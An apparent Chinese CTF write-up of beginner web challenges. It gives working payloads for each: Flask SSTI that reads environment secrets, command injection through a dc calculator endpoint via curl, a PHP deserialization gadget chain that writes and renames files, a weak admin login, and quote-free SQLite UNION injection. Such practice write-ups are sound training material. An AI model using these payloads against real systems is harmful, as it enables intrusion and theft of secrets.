做不过来了,就跟着做了一点
第一周
#### ez_ssti
from flask import Flask, request, render_template, render_template_string
import os
app = Flask(__name__)flag=os.getenv("flag")
os.unsetenv("flag")
@app.route('/')
def index():return open(__file__, "r").read()@app.errorhandler(404)
def page_not_found(e):print(request.root_url)return render_template_string("The Url {} You Requested Can Not Found".format(request.url))if __name__ == '__main__':app.run(host="0.0.0.0", port=8000)
直接在url后面添加
{{ config.__class__.__init__.__globals__['os'].environ['flag'] }}
即可
ez_rce
from flask import Flask, request
import subprocessapp = Flask(__name__)@app.route("/")
def index():return open(__file__).read()@app.route("/calc", methods=['POST'])
def calculator():expression = request.form.get('expression') or "114 1000 * 514 + p"result = subprocess.run(["dc", "-e", expression], capture_output=True, text=True)return result.stdoutif __name__ == "__main__":app.run(host="0.0.0.0", port=8000)
直接rce
curl -X POST http://47.76.152.109:60081//calc -d "expression=1 2 + !env"
hello_web
签到
hello_http
http题目
ez_unser
php反序列化
<?php
highlight_file(__FILE__);
class Man{private $name="原神,启动";public function __wakeup(){echo str_split($this->name);}
}
class What{private $Kun="两年半";public function __toString(){echo $this->Kun->hobby;return "Ok";}
}
class Can{private $Hobby="唱跳rap篮球";public function __get($name){var_dump($this->Hobby);}
}
class I{private $name="Kobe";public function __debugInfo(){$this->name->say();}}
class Say{private $evil;public function __call($name, $arguments){$this->evil->Evil();}
}
class Mamba{public function Evil(){$filename=time().".log";file_put_contents($filename,$_POST["content"]);echo $filename;}
}
class Out{public function __call($name,$arguments){$o = "./".str_replace("..", "第五人格",$_POST["o"]);$n = $_POST["n"];rename($o,$n);}
}
unserialize($_POST["data"]);
链子从上往下就行,先写个文件,然后去改名.exp如下.
<?php
highlight_file(__FILE__);
class Man{private $name;public function setname($name){$this->name = $name;}
}
class What{private $Kun;public function setKun($Kun){$this->Kun = $Kun;}
}
class Can{private $Hobby;public function setHobby($Hobby){$this->Hobby = $Hobby;}
}
class I{private $name;public function setname($name){$this->name = $name;}
}
class Say{private $evil;public function setevil($evil){$this->evil = $evil;}
}
class Mamba{
}
class Out{
}
$a = new Man();
$b = new What();
$c = new Can();
$d = new I();
$e = new Say();
$f = new Mamba();
//$f = new Out();
$e->setevil($f);
$d->setname($e);
$c->setHobby($d);
$b->setKun($c);
$a->setname($b);
echo serialize($a);
ez_login
弱密码,admin/admin123
ez_sql
sqlite注入有黑名单,扔个fuzz看看,发现单双引号被枪毙了.
没有单双引号,可以使用char()去拼凑字符串.数字注入不用担心闭合.
用order by判断了列数为5(虽然直接看也像是5),然后构造payload.
UNION SELECT NULL,NULL,NULL,NULL,group_concat(name) FROM sqlite_master WHERE type=char(116,97,98,108,101)--
UNION SELECT NULL,NULL,NULL,NULL,group_concat(name) FROM pragma_table_info(char(102,108,97,103))--
UNION SELECT NULL,NULL,NULL,NULL,group_concat(flag) FROM flag--